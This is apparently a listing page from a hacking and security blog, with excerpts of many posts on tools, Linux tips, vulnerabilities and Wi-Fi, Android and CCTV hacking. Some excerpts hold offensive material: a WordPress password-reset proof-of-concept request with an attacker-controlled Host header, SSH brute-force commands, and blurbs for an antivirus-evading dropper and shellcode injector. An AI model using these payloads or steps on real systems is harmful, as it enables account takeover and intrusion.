scanner](https://who-ami.net/hackers-bypassed-galaxy-s10-ultrasonic-biometric-fingerprint-scanner/) - There are security vulnerabilities in the Samsung Galaxy S10 ultrasonic biometric fingerprint scanner, and hackers can use the 3D printed fingerprint of the mobile phone user to pass the verification. The Samsung S10 and S10+ use ultrasonic fingerprinting technology, which is safer than traditional fingerprint scanning technology. Samsung has claimed that even if someone has a 3D - [testssl.sh v3.0 rc5 releases](https://who-ami.net/testssl-sh-v3-0-rc5-releases/) - Testing TLS/SSL encryption anywhere on any port testssl.sh is a free command line tool which checks a server’s service on any port for the support of TLS/SSLcyphers, protocols as well as some cryptographic flaws. Key features Clear output: you can tell easily whether anything is good or bad Ease of installation: It works for Linux, Darwin, FreeBSD, - [conjur v1.4.0 releases](https://who-ami.net/conjur-v1-4-0-releases/) - Secures secrets used by privileged users and machine identities Conjur provides secrets management and machine identity for modern infrastructure: Machine Authorization Markup Language (“MAML”), a role-based access policy language to define system components & their roles, privileges, and metadata A REST web service to: manage identity life cycles for humans and machines organize and search roles and - [MITMsmtp v0.0.2 released](https://who-ami.net/mitmsmtp-v0-0-2-released/) - Evil SMTP Server for pentesting SMTP clients MITMsmtp MITMsmtp is an Evil SMTP Server for pentesting SMTP clients to catch login credentials and mails sent over plain or SSL/TLS encrypted connections. The idea is to catch sensitive emails sent by clients which are not correctly verifying the SMTP servers identity in SSL/TLS mode. It will catch username - [PuTTY 0.71 Released](https://who-ami.net/putty-0-71-released/) - SSH Client Updated To Fix a Large Number of Security Vulnerabilities The free and open-source SSH client updated with the fix for a number of Security Vulnerabilities including the one in RSA key exchange and the latest version is PuTTY 0.71. PuTTY is an SSH and telnet client for the Windows platform. PuTTY is an - [Chmod, file permission, and the octal notation](https://who-ami.net/chmod-file-permission-and-the-octal-notation/) - In this post we are going to discuss some of the Linux/Unix file system permissions. There are two basic commands for changing the ownership and permissions of a file system, namely, chmod and chown. In this post, we will be discussing one of the two – the chmod (contraction of change and mode) command. One of the most critical jobs - [Linux Distribution for new Linux users](https://who-ami.net/linux-distribution-for-new-linux-users/) - Website Linux Mint First distributed in 2006, it has a reputation for staying up-to-date, with updates being issued every six months. If you are a new to Linux and unsure as to which variant to install, Mint Linux is a safe choice. It comes in two “flavors” — one running on the codebase of Debian - [Do We Really Need Antivirus ?](https://who-ami.net/do-we-really-need-antivirus/) - The online world is ablaze with a discussion about whether having anti-virus software on a computer could actually pose a greater risk than the malware it is intended to safeguard against. It was Robert O’Callahan, formerly head developer at Mozilla, who got the ball rolling. He advised computer users to disable all virus scanners - [Web Exploit Detector](https://who-ami.net/web-exploit-detector/) - The simplest way to install Web Exploit Detector is as a global NPM module: - npm install -g web_exploit_detector If you are running Linux or another Unix-based OS you might need to run this command as root (e.g. sudo npm install -g web_exploit_detector). Updating The module should be updated regularly to make sure that all - [Nmap NSE script to detect MS17-010](https://who-ami.net/nmap-nse-script-to-detect-ms17-010/) - execution vulnerability (ms2017-010). The script connects to the $IPC tree, executes a transaction on FID 0 and checks if the error “STATUS_INSUFF_SERVER_RESOURCES” is returned to determine if the target is not patched against CVE2017-010. Tested on a vulnerable Windows 7. We might have some issues with v2 protocols with signing enabled. Usage Download smb-vuln-ms17-010.nse Save it - [Hack Android](https://who-ami.net/hack-android/) - But please remember don't use it as illegally to exploit someone privacy who not belongs to you.... What actually are we doing: Prerequisites : A PC or Laptop running on Linux Operating System Active Internet Connection An Android device to exploit Features of this HACK : Get contacts from remote android device. Click snaps using - [Hackers Category](https://who-ami.net/hackers-category/) - Black hat hackers can range from teenage amateurs who spread computer viruses to networks of criminals who steal credit card numbers and other financial information. Black hat hacker activities include planting keystroke-monitoring programs to steal data and launching attacks to disable access to websites. Malicious hackers sometimes employ non-computer methods to obtain data, for example, - [Pentesting Linux Distributions](https://who-ami.net/pentesting-linux-distributions/) - 1. Kali Linux Pentesting "Hacking Linux Distribution" Kali Linux is a very popular Debian-derived Linux distribution which is created by Offensive Security. Kali, as it is often abbreviated to, is designed for digital forensics and penetration testing. This hacking distribution was the continuation in a long line of pentesting distros - being created after the - [Metasploit](https://who-ami.net/330/) - In 2003, H.D. Moore, (a Cyber Security Researcher and Program Developer from the US) started the Metasploit Project with the intention being to create a public and freely accessible resource to obtain exploitable code for research and development. The Metasploit Project is credited with the creation of the Metasploit Framework, which has become an open-source - [Useful Commands to Collect System and Hardware Information in Linux](https://who-ami.net/useful-commands-to-collect-system-and-hardware-information-in-linux/) - [1:0:1:0] disk ATA WDC WD5000AAKX-0 1H15 /dev/sda It is always a good practice to know the hardware components of your Linux system is running on, this helps you to deal with compatibility issues when it comes to installing packages, drivers on your system. 1. How to View Linux System Information To know only system name, - [ProRat](https://who-ami.net/prorat/) - What is ProRat ? And how we us it ? ProRat is a Remote Administration Tool made by PRO Group.ProRat was written in C programming language and its capable to work with all windows operating systems.ProRat is made for remoting your own computers from other computers.ProRat supports bir lots of languages. Things we need : - [How to Change Window User Password](https://who-ami.net/how-to-change-window-user-password/) - So with this trick you can change any Windows System Password without Knowing Old Password.This trick works in all Window versions like Window 8 and Window 10. Method 2 Change Window Password Without Knowing old Password from Command Prompt Step 1: Click on Window Start menu and type “cmd” in the search box. Then select - [Wi-Fi Password Hack](https://who-ami.net/wi-fi-password-hack/) - Hack WiFi Password b- Alfa AWUS036H c- wifiy-city 56G d- you can check this page for card compatibili compatibility drivers A word list comprising of all the possible different combination of pass Download Wordlist These dictionaries that come with some of penetration tools john.txt.bz2 twitter-banned.txt.bz2 conficker.txt.bz2 500-worst-passwords.txt.bz2 cain.txt.bz2 or Leaked passwords dictionaries those were leaked or - [Kali Bootable USB](https://who-ami.net/kali-bootable-usb/) - If you don’t want to install kali linux on your hard disk , you only want to test it, is good to run Kali Linux live from a USB. What you need: Kali Linux iso file. (32bit or 64bit) Usb Drive (minimum 4gb or larger) Rufus Other method is Universal USB Installer What - [WiFiPhisher – Automated Phishing Attacks](https://who-ami.net/wifiphisher-automated-phishing-attacks/) - From the victim’s perspective, the attack makes use in three phases: Victim is being deauthenticated from her access point. WiFi-phisher continuously jams all of the target access point’s WiFi devices within range by forging “De-authenticate” or “Disassociate” packets to disrupt existing associations. Victim joins a rogue access point. WiFi-phisher sniffs the area and copies the - [DoubleAgent: Taking Full Control Over Your Antivirus](https://who-ami.net/doubleagent-taking-full-control-over-your-antivirus/) - The attack begins when the attacker injects code into the antivirus by exploiting a new Zero-Day vulnerability. Once inside, the attacker can fully control the antivirus. We named this attack DoubleAgent, as it turns your antivirus security agent into a malicious agent, giving an illusion that the antivirus protects you while actually it is abused - [Hidden Windows secret command line Tricks](https://who-ami.net/hidden-windows-secret-command-line-tricks/) - If you are from Dos generation, you will agree that the Dos tricks were best shortcuts to get the work done. Thankfully Windows has continued using Dos in its Windows iteration and you can use Command Prompt to execute tricks even in Windows 10. For those who have not used Dos commands, the Windows - [Best anti-hacking software to protect your Windows](https://who-ami.net/best-anti-hacking-software-to-protect-your-windows/) - • You are always protected against the most recent threats with cloud-based scans. • Protects your web browser from adware extensions. Download Enhanced Mitigation Experience Toolkit Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) is a freeware security toolkit for Microsoft Windows. It provides a unified interface to enable and fine-tune Windows security features. The most common - [Capturing, Analysing and Responding to Cyber Attacks (Cyber Probe )](https://who-ami.net/capturing-analysing-and-responding-to-cyber-attacks-cyber-probe/) - The code is targeted at the Linux platform, although it is generic enough to be applicable to other UN*X-like platforms. The easiest way to learn about the software is to follow our Quick Start tutorial. Download - [PeTest CMD Manager (Automate Your PenTest Attacks In One Click)](https://who-ami.net/petest-cmd-manager-automate-your-pentest-attacks-in-one-click/) - Nozes Nozes is a Pentest cmd manager. You can automate your pentest attacks in one click and get results... Read the docs: https://github.com/CoolerVoid/nozes/blob/master/doc/nozes_apresentation1.pdf How to Install Need: * httpd server with TLS/SSL * SQLite3 * php5 and php5-sqlite and PDO driver of sqlite I test at nginx + php + fastcgi.. 1-step $ git clone - [OWASP Security Shepherd](https://who-ami.net/owasp-security-shepherd/) - Web And Mobile Application Security Training Platform OWASP Security Shepherd The OWASP Security Shepherd Project is a web and mobile application security training platform. Security Shepherd has been designed to foster and improve security awareness among a varied skill-set demographic. The aim of this project is to take AppSec novices or experienced engineers and sharpen - [FiercePhish](https://who-ami.net/fiercephish/) - A Full-Fledged Phishing Framework To Manage All Phishing Engagements FiercePhish FiercePhish is a full-fledged phishing framework to manage all phishing engagements. It allows you to track separate phishing campaigns, schedule sending of emails, and much more. The features will continue to be expanded and will include website spoofing, click tracking, and extensive notification options. - [Reversemap](https://who-ami.net/reversemap/) - Analyse SQL injection attempts in web server logs reversemap Analyse SQL injection attempts in web server logs The program can either be run in batch mode or interactive mode. In batch mode the program will accept Apache web server logs and will deobfuscate requested URLs from the logs. In interactive mode the program will - [FalconGate](https://who-ami.net/falcongate/) - A smart gateway to stop hackers and Malware attacks Motivation Cyber attacks are on the raise. Hacker and cyber criminals are continuously improving their methods and building new tools and Malware with the purpose of hacking your network, spying on you and stealing valuable data. Recently a new business model has become popular among hackers: - [Dr0p1t-Framework](https://who-ami.net/dr0p1t-framework/) - A Framework That Creates An Advanced FUD Dropper With Some Tricks Have you ever heard about trojan droppers ? In short dropper is type of trojans that downloads other malwares and Dr0p1t gives you the chance to create a dropper that bypass most AVs and have some tricks ;) Features Framework works with Windows - [PloitKit](https://who-ami.net/ploitkit/) - The Hacker's ToolBox PloitKit is a Python based GUI tool designed as one-stop for all other softwares. I was facing these kinds of problem, when I need to switch to different system, or I lost my pen-drive. I have to go to google, and search every tool and download every tool and so on. - [Squidmagic](https://who-ami.net/squidmagic/) - Analyze a Web-Based Network Traffic to Detect Central Command and Control (C&C) Servers and Malicious Site Squidmagic is a tool designed to analyze a web-based network traffic to detect central command and control (C&C) servers and Malicious site, using Squid proxy server and Spamhaus. Install Ubuntu 16.04 Clone this repo & execute the script squidmagic# - [Struts2Shell](https://who-ami.net/struts2shell/) - Interactive Shell Command Improves manipulation and sending commands to the vulnerable server using a shell. Usage: python Struts2Shell.py Download - [SSLsplit](https://who-ami.net/sslsplit/) - Tool For Man-In-The-Middle Attacks Against SSL/TLS Encrypted Network Connections SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encrypted network connections. It is intended to be useful for network forensics, application security analysis and penetration testing. SSLsplit is designed to transparently terminate connections that are redirected to it using a network address translation engine. - [Xerosploit](https://who-ami.net/xerosploit/) - Efficient And Advanced Man In The Middle Framework Xerosploit is a penetration testing toolkit whose goal is to perform man in the middle attacks for testing purposes. It brings various modules that allow to realise efficient attacks, and also allows to carry out denial of service attacks and port scanning. Powered by bettercap and nmap - [Pyinotify – Monitor Filesystem Changes in Real-Time in Linux](https://who-ami.net/pyinotify-monitor-filesystem-changes-in-real-time-in-linux/) - Pyinotify As a System administrator, you can use it to monitor changes happening to a directory of interest such as web directory or application data storage directory and beyond. It depends on inotify (a Linux kernel feature incorporated in kernel 2.6.13), which is an event-driven notifier, its notifications are exported from kernel space to user - [New Ransomware Decryption Tools Available for Free (No More Ransom)](https://who-ami.net/new-ransomware-decryption-tools-available-for-free-no-more-ransom/) - Ransomware Decryption Tools No More Ransom, so is the Ransomware Threat. Launched less than a year ago, the No More Ransom (NMR) project has increased its capacity with new partners and new decryption tools added to its now global campaign to combat Ransomware. Started as a joint initiative by Europol, the Dutch National Police, Intel - [Fix High CPU Usage and RAM Leakage in Windows 10](https://who-ami.net/fix-high-cpu-usage-and-ram-leakage-in-windows-10/) - Fix High RAM Leakage and High CPU Use of Windows 10 If you are using a Windows 10 run PC or laptop you may have already encountered this problem. Several Windows 10 users have reportedly been complaining on Reddit and Microsoft Forums about unexpected memory leaks pertaining to system processes like ntoskrnl.exe and Runtime Broker, wherein - [Find And Kill A Remote Connecting Malware On Windows](https://who-ami.net/find-and-kill-a-remote-connecting-malware-on-windows/) - Find And Kill A Remote Connecting Malware On Windows The simple and easy steps on how to find, kill and delete a remote connecting malware using command prompt on Windows 10. These steps use PID of an unwanted remote connection and based on that, we take the further actions to delete the malware. Command prompt can - [Zero Day Vulnerability Found In Microsoft](https://who-ami.net/zero-day-vulnerability-found-in-microsoft/) - Security Companies McAfee and FireEye detects Microsoft Zero-day Bug in Office 2016 which is running on Windows 10. A scenario of this Zero day vulnerability attack is Malicious document file E-mailing to victim contains an embedded OLE2link object, when the victim opens the attachment document file winword.exe contacts a remote server over HTTP request to - [A prototype SSH Configuration and Policy Scanner (ssh_scan)](https://who-ami.net/a-prototype-ssh-configuration-and-policy-scanner-ssh_scan/) - Sources of Inspiration for ssh_scan Mozilla OpenSSH Security Guide - For providing a sane baseline policy recommendation for SSH configuration parameters (eg. Ciphers, MACs, and KexAlgos). Download - [NETATTACK ( Scan and Attack Wireless Networks )](https://who-ami.net/netattack-scan-and-attack-wireless-networks/) - NETATTACK The netattack.py is a python script that allows you to scan your local area for WiFi Networks and perform deauthentification attacks. The effectiveness and power of this script highly depends on your wireless card. USAGE SCANNING FOR WIFI NETWORKS python netattack.py -scan -mon This example will perform a WiFi network scan. The BSSID, ESSID - [Enable SSH on Kali Linux](https://who-ami.net/enable-ssh-on-kali-linux/) - Enable SSH on Kali Linux Kali Linux does not come with SSH enabled. SSH is the preferred method of remote management for most Linux based systems. Secure Shell (SSH) is a cryptographic network protocol for secure data communication, remote command-line login, remote command execution, and other secure network services between two networked computers. It connects, via a secure channel over an insecure network, a server and - [New Malware Samples Target Android Users](https://who-ami.net/new-malware-samples-target-android-users/) - New Malware Samples Target Android Users The Cybercriminals are setting their eyes on new Android devices, as 750,000 Android malware apps are found in the first quarter of 2017, this means, almost 8,400 new malware cases are found every single day. According to the security firm G Data by the end of this year, it is - [Hacking website using SQL Injection](https://who-ami.net/hacking-website-using-sql-injection/) - SQL Injection is a malicious attack where malicious users can inject SQL commands (commonly referred to as malicious payload) in SQL statement that controls the web application database (commonly referred to as Relational Database Management System – RDBMS), within the web input field.The SQL injection vulnerability can damage any website or web application that is - [Kali Linux can now run in a browser](https://who-ami.net/kali-linux-can-now-run-in-a-browser-2/) - Kali Linux can now run in a browser Specially for hackers : You can now run Kali Pentesting OS in your web browser This bit of news is going to elate hackers and security researchers. Kali Linux is one of the most loved distros by the security community and it is now coming to in - [Google using Google Dorking](https://who-ami.net/google-using-google-dorking/) - Google using Google Dorking How to use Google like a pro using Google Dorking Google Dorking enables users to stitch their queries together in a long query and get hitherto unknown information from Google. Through this article we take the proficiency of Google as a hacking tool. If you have a PC/laptop, it is guaranteed that you - [Exploiting Apache Struts S2-045 (CVE-2017-5638) vulnerability](https://who-ami.net/exploiting-apache-struts-s2-045-cve-2017-5638-vulnerability/) - Exploiting Apache Struts S2-045 (CVE-2017-5638) vulnerability Apache Struts is an open source project maintained by the Apache Software Foundation, an open source MVC framework for creating enterprise Java Web applications, offering two versions of the framework products: Struts 1 and Struts 2. Struts2 is a MVC design based on the Web application framework, which is - [Install Kali Linux Tools Using Katoolin](https://who-ami.net/install-kali-linux-tools-using-katoolin/) - Install Kali Linux Tools Using Katoolin This tutorial walk you through installing Kali Linux Tools using Katoolin in Linux. For those who don’t know, Katoolin is a Python script which is used to install all Kali Linux tools either automatically or manually. Kali Linux has more than 300 penetration testing tools. Instead of installing - [Anti Sniffer Tools To Protect You From Sniffing Attacks](https://who-ami.net/anti-sniffer-tools-to-protect-you-from-sniffing-attacks/) - So today we are posting some Antisniffer tools to protect you from sniffing attacks. Sniff joke: SniffJoke is an application for Linux that handle transparently your TCP connection, delaying, modifying and inject fake packets inside your transmission, make them almost impossible to be correctly read by a passive wiretapping technology (IDS or sniffer). Download - [PuTTY 0.69 released](https://who-ami.net/putty-0-69-released/) - PuTTY 0.69 released (Free SSH,Telnet,SFTP Client) Putty is a terminal emulator software program available on Windows and Unix operating systems that allows you to log in to another computer and use it as if you were sitting at that computer (even though you are physically at a different computer). PuTTY supports SSH, Telnet, rlogin, - [SNMP Authentication Bypass](https://who-ami.net/snmp-authentication-bypass/) - SNMP Authentication Bypass The SNMP(Simple Network Management Protocol) embedded in many Internet connected devices allows the attackers to bypass the authentication by jsut sending random values in the requests, security researchers have found. The SNMP is a very popular protocol for the network management which features support for three ways to authenticate client and requests - [Microsoft Reveals Types of Data Windows 10 Collected from You](https://who-ami.net/microsoft-reveals-types-of-data-windows-10-collected-from-you/) - Microsoft Reveals Types of Data Windows 10 Collected from You Since 2015, when Windows 10 was officially launched, there were concerns about user privacy; almost after two years, the company has revealed what types of information Windows 10 has collected. Since 2015, when Windows 10 was officially launched, there were concerns about user privacy; almost after - [WordPress Potential Unauthorized Password Reset (CVE-2017-8295)](https://who-ami.net/wordpress-potential-unauthorized-password-reset-cve-2017-8295/) - PoC HTTP Request POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1 Host: injected-attackers-mxserver.com Content-Type: application/x-www-form-urlencoded Content-Length: 56 user_login=admin&redirect_to=&wp-submit=Get+New+Password Temporary protection method Currently WordPress official no related repair and update, the user can take the following temporary protection program: The user can turn on UseCanonicalName to force the static SERVER_NAME value. Reference - [Secret Hack Codes For Android](https://who-ami.net/secret-hack-codes-for-android/) - Battery information (How to maximize or boost battery life in android phones) Battery history Usage statistics 2. Factory Data Reset *#*#7780#*#* This code can be used for a factory data reset. It’ll remove the following things: Google account settings stored in your phone System and application data and settings Downloaded applications It will NOT remove: - [WarChild](https://who-ami.net/warchild/) - WarChild Denial of Service Testing Suite Warchild is a denial of service testing suite made for analysing the strength of your website against different kinds of denial of service attacks you will be facing which are mainly organised by crooks to cause damage to your website. Installation For Installing the required modules just run - [Intel chips Vulnerability](https://who-ami.net/intel-chips-vulnerability/) - Intel chips Vulnerability A vulnerability in Intel chips that went undiscovered for almost a decade allows hackers to remotely gain full control over affected Windows PCs without needing a password. The “critical”-rated bug, disclosed by Intel last week, lies in a feature of Intel’s Active Management Technology (more commonly known as just AMT), which allows - [Secret Facebook messages](https://who-ami.net/secret-facebook-messages/) - Facebook is hiding your messages in a ‘secret’ inbox Here’s how you can read your ‘secret’ Facebook messages Did you know there is a “secret” Facebook Messenger inbox that stores messages that you probably didn’t know existed. This ‘secret’ inbox may contain certain important messages you would like to read, but had no idea - [Everything you need to know about Wanna cry ransomware](https://who-ami.net/everything-you-need-to-know-about-wannacry-ransomware/) - Everything you need to know about Wanna cry ransomware One of the largest cyberattacks ever is currently eating the web, hitting PCs in countries and businesses around the world. You’ve heard the phrase “the road to Hell is paved with good intentions,” right? Well, a vulnerability first uncovered by the National Security Agency and - [What is a Man-in-the-Middle Attack (MITM) ?](https://who-ami.net/what-is-a-man-in-the-middle-attack-mitm/) - What is a Man-in-the-Middle Attack and How Can You Prevent It? In 2015, a cyber-criminal group in Belgium stole a total of €6 million by hacking through middle-sized and large European companies. The hackers were able to gain access of corporate email accounts and request money from clients using the hacked accounts. According to Europol’s official press - [Microsoft Malware Protection Engine Remote Code Execution Vulnerability](https://who-ami.net/microsoft-malware-protection-engine-remote-code-execution-vulnerability/) - Microsoft Malware Protection Engine Remote Code Execution Vulnerability (CVE-2017-0290) Vulnerability identify CVE-2017-0290 Vulnerability Finder Natalie Silvanovich and Tavis Ormandy of Google Project Zero Vulnerability An attacker who successfully exploited this vulnerability could execute arbitrary code under the LocalSystem account and control the system. An attacker could install a program; view, change, or delete data; - [Modify SSH remote login port in Linux](https://who-ami.net/modify-ssh-remote-login-port-in-linux/) - [Pandas 0.20.1](https://who-ami.net/pandas-0-20-1/) - Pandas 0.20.1 Python data analysis toolkit Pandas is an open source library licensed by BSD that provides high-performance, easy-to-use data structures and data analysis tools for Python programming languages. Pandas 0.20.1 is another major release since 0.19.2, including many API changes, deprecations, new features, functional improvements, performance improvements, and a lot of bug fixes. - [TrustlookWannaCryToolkit](https://who-ami.net/trustlookwannacrytoolkit/) - [Unicorn](https://who-ami.net/unicorn/) - Unicorn PowerShell downgrade attack Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber’s PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18. Usage is simple, just run Magic Unicorn (ensure Metasploit is installed - [BruteSpray](https://who-ami.net/brutespray/) - BruteSpray Brute-Forcing from Nmap output (Automatically attempts default creds on found services) BruteSpray takes nmap GNMAP output and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap. Usage First do an nmap scan with '-oA nmap.gnmap'. Command: python brutespray.py -h Example: python brutespray.py --file - [Linux Terminal Command](https://who-ami.net/linux-terminal-command/) - cal – Show this month’s calendar uptime – Show current uptime w – Display who is online whoami – Who you are logged in as finger user – Display information about user uname -a – Show kernel information cat /proc/cpuinfo – CPU information cat /proc/meminfo – Memory information df – Show disk usage du – - [WiFi-Pumpkin v0.8.5](https://who-ami.net/wifi-pumpkin-v0-8-5/) - WiFi-Pumpkin Framework for Rogue Wi-Fi Access Point Attack WiFi-Pumpkin is a very complete framework for auditing Wi-Fi security. The main feature is the ability to create a fake AP and make Man In The Middle attack, but the list of features is quite broad. Installation Python 2.7 git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git cd WiFi-Pumpkin ./installer.sh - [What you need to know about the WannaCry Ransomware](https://who-ami.net/what-you-need-to-know-about-the-wannacry-ransomware/) - Symantec has the following IPS protection in place to block attempts to exploit the MS17-010 vulnerability: OS Attack: Microsoft SMB MS17-010 Disclosure Attempt (released May 2, 2017) Attack: Shellcode Download Activity (released April 24, 2017) SONAR behavior detection technology SONAR.AM.E.!g18 SONAR.AM.E!g11 SONAR.Cryptlk!g1 SONAR.Cryptlocker!g59 SONAR.Cryptlocker!g60 SONAR.Cryptlocker!g80 SONAR.Heuristic.159 SONAR.Heur.Dropper SONAR.Heur.RGC!g151 SONAR.Heur.RGC.CM!g13 SONAR.Heuristic.158 SONAR.Heuristic.161 SONAR.SuspDataRun SONAR.SuspLaunch!g11 SONAR.SuspLaunch!gen4 SONAR.TCP!gen1 - [KickThemOut](https://who-ami.net/kickthemout/) - KickThemOut KickThemOut – Kick Devices Off Your Network A tool to kick devices out of your network and enjoy all the bandwidth for yourself. It allows you to select specific or all devices and ARP spoofs them off your local area network. Compatible with Python 2.6 & 2.7. Installation You can download KickThemOut by cloning - [Veil 3.0](https://who-ami.net/veil-3-0/) - Veil 3.0 Antivirus evasion and evading detection The Veil-Framework is a collection of red team security tools that implement various attack methods focused on antivirus evasion and evading detection. Antivirus ‘solutions’ don’t often catch the bad guys, but they do often catch pen-testing during assignment. This tool came about as a way to execute - [All about HTTPS SSL Encryption](https://who-ami.net/all-about-https-ssl-encryption/) - All about HTTPS SSL Encryption Analysis of HTTPS SSL Encryption SSL (Secure Socket Layer): Netscape company is designed for WEB security transmission protocol. From the name you can see it in the https protocol stack is responsible for the above-mentioned encryption layer. Article Content HTTPS SSL certificate HTTPS work process One-way encryption Nginx configuration unidirectional encryption - [Apache Struts2 arbitrary code execution vulnerability](https://who-ami.net/apache-struts2-arbitrary-code-execution-vulnerability/) - Apache Struts2 arbitrary code execution vulnerability (S2-045, CVE-2017-5638) Apache Struts is an open source project maintained by the Apache Software Foundation, an open source MVC framework for creating enterprise Java Web applications. CVE Identifier CVE-2017-5638 Introduction to Vulnerability Struts uses Jakarta to resolve file upload requests inappropriate when a remote attacker constructs a malicious - [Brutal](https://who-ami.net/brutal/) - Brutal A Toolkit To Create Various HID Attacks Brutal is a simple toolkit to quickly create various payload,powershell attack , virus attack and launch listener for a Human Interface Device. It is used on a target machine without the need for human-to-keyboard interaction ( HID -ATTACK ). When you insert the device, it will be detected - [Create SSH BruteForcer in Python](https://who-ami.net/create-ssh-bruteforcer-in-python/) - python SSHBruteForce.py -i 127.0.0.1 -d True -p 2222 -U ./usernames.txt -P ./passwords.txt Single Ip Dictonary Attack Specifying thread and timeout: python SSHBruteForce.py -i 127.0.0.1 -d True -p 2222 -U ./usernames.txt -P ./passwords.txt -t 15 -T 30 Multiple Ip Dictonary Attacks: python SSHBruteForce.py -I ./targets.txt -d True -p 2222 -U ./usernames.txt -P ./passwords.txt -t 15 -T - [Top 25 Weak Passwords Of All Time](https://who-ami.net/top-25-weak-passwords-of-all-time/) - Frequent usage also applies to another group of passwords on the list: sequences. “123456”, “qwerty” or “zaq1zaq1” are key sequences, which means the used symbols are near one another on the physical keyboard. This kind of passwords is another dictionary favorite, but is also susceptible to a brute force attack. This tactic is similar to - [Protect With Password Any Folder Without Software](https://who-ami.net/protect-with-password-any-folder-without-software/) - Protect With Password Any Folder Without Software This tutorial will show you interesting and useful trick to password protect folder without using any software using batch file programming. This trick will work on all windows platform. How To Lock Folder ? 1. Open Notepad and Copy code given below into it. cls @ECHO OFF title whoami.net - [Know When Your SSD Will Die](https://who-ami.net/know-when-your-ssd-will-die/) - Know When Your SSD Will Die Hard drives are fundamentally different from SSDs. SSDs can die in one of two ways. In this article, we will explain the difference about how SSDs can die and how you can check if yours still have plenty of life. The major difference between SSDs and hard drives is - [Facebook Chrome Extension](https://who-ami.net/facebook-chrome-extension/) - Facebook Chrome Extension This Chrome Extension Monitors all your Facebook Activities We all know that the Facebook studies and monitors the activities of its users for various purposes using their own Artificial Intelligence mechanism. This data helps the social network in showing the relevant information on the user’s News Feed, which is usually evaluated by - [scanless](https://who-ami.net/scanless/) - [Windows 10 keyboard shortcuts that you should know](https://who-ami.net/windows-10-keyboard-shortcuts-that-you-should-know/) - Windows 10 keyboard shortcuts that you should know Microsoft has cooked in a number of multitasking keyboard shortcuts in Windows 10 which you should know Windows 10, the latest operating system that was released by Microsoft yesterday offers you a list of keyboard shortcuts that will speed up and give a faster browsing experience. - [googler](https://who-ami.net/googler/) - googler Google Search, Google Site Search, Google News from the terminal Demo Video googler is a power tool to Google (Web & News) and Google Site Search from the command-line. It shows the title, URL and abstract for each result, which can be directly opened in a browser from the terminal. Results are fetched in - [Brosec](https://who-ami.net/brosec/) - Brosec Overview (tl;dr) Brosec is a terminal based reference utility designed to help us infosec bros and broettes with useful (yet sometimes complex) payloads and commands that are often used during work as infosec practitioners. An example of one of Brosec's most popular use cases is the ability to generate on the fly reverse - [Infoga (Email Information Gathering)](https://who-ami.net/infoga-email-information-gathering/) - Infoga is a tool for gathering e-mail accounts information from different public sources (search engines, pgp key servers). It is a really simple tool, but very effective for the early stages of a penetration test or just to know the visibility of your company in the Internet. Installation git clone https://github.com/m4ll0k/Infoga.git cd Infoga pip install - [Cowrie](https://who-ami.net/cowrie/) - Cowrie SSH/Telnet Honeypot Cowrie is a medium interaction SSH and Telnet honeypot designed to log brute force attacks and the shell interaction performed by the attacker. Cowrie is developed by Michel Oosterhof Features Some interesting features: Fake filesystem with the ability to add/remove files. A full fake filesystem resembling a Debian 5.0 installation is - [HTML Cheat Sheet](https://who-ami.net/html-cheat-sheet/) - Image …. Image Map Area of image map Common Character Entities " ” Quotation mark & & Ampersand < < Less than > > Greater than @ @ “At” symbol € € Euro • • Small bullet ™ ™ Trademark £ £ - [PHP Cheat Sheet](https://who-ami.net/php-cheat-sheet/) - PHP Cheat Sheet PHP cheat sheet for newbies learning PHP. PHP Array Functions array_diff (arr1, arr2 ...) array_filter (arr, function) array_flip (arr) array_intersect (arr1, arr2 ...) array_merge (arr1, arr2 ...) array_pop (arr) array_push (arr, var1, var2 ...) array_reverse (arr) array_search (needle, arr) array_walk (arr, function) count (count) in_array (needle, haystack) PHP String Functions crypt - [Security Cheat Sheets for Ethical Hacking](https://who-ami.net/security-cheat-sheets-for-ethical-hacking/) - Security Cheat Sheets for Ethical Hacking Security cheat sheets for Ethical Hacking and Penetration Testing by sniferl4bs. This cheat sheet is especially for penetration testers/CTF participants/security enthusiasts. Download and Extract Command: wget https://github.com/Snifer/security-cheatsheets/archive/master.zip unzip master.zip Contents: aircrack-ng airport burp cewl cidr cookies dig fierce ftp golismero hping http https-ssl-tls hydra john maltego markdown medusa metasploit msfvenom - [Find Direct Download Link Of Any Movie](https://who-ami.net/find-direct-download-link-of-any-movie/) - Find Direct Download Link Of Any Movie Everyone would be a movie lover like me. But when you search a movie on Google and click on any website, you would find a lot of pop-ups, banner and irrelevant ads. So here we have a cool way to find a direct download link of any movie, - [Exploit CCTV Private cameras](https://who-ami.net/exploit-cctv-private-cameras/) - Download and Install Angry ip scanner Step 2: Choose Ip Address Range Its important that how to choose proper ip address range for CCTV camera hacking. CCTV cameras are connected with broadband internet connection. If your accessing broadband router then find your public ip address. Just type My IP in Google or Bing search bar. - [Fluxion (wi-fi hack)](https://who-ami.net/fluxion-wi-fi-hack/) - Step 2: Capture a handshake (can’t be used without a valid handshake, it’s necessary to verify the password) Step 3: Use WEB Interface * Step 4: Launch a FakeAP instance to imitate the original access point Step 5: Spawns a MDK3 process, which deauthenticates all users connected to the target network, so they can be - [Hack any WPA2/WEP/WPA Wifi using Dumpper and Jumpstart](https://who-ami.net/hack-any-wpa2wepwpa-wifi-using-dumpper-and-jumpstart/) - Note: Dont STOP the Process. It Takes Several Minutes . Probably 4~5 Hours.(Works Only in Laptops). Update: We have also Added the Process to Hack Wifi in Desktops Below.Hack WiFi with Dumpper and Jumpstart: Download and install JumpStart, WinPcap, and Dumpper Open Dumpper. It’ll be in Spanish, so go to the far right tab and - [Create a NAS from your old PC](https://who-ami.net/create-a-nas-from-your-old-pc/) - 2) Protect your data. 3) Encrypt your data. 4) Backup your computers image to your FreeNAS Device. 5) File sharing across your windows and mac users. 6) Control the Operating System from your own PC. 7) Plus many Plugins to provide additional features. How to Build your Own NAS Requirements An old PC, here is - [MalwareSearch](https://who-ami.net/malwaresearch/) - Optional Arguments: $ malwaresearch.py [--h HELP] [-f FIND] [-w WRITE] usage: malwaresearch.py [-h] [-f Sample | -d Hash] [-w File] [-o Int] MalwareSearch 0.1 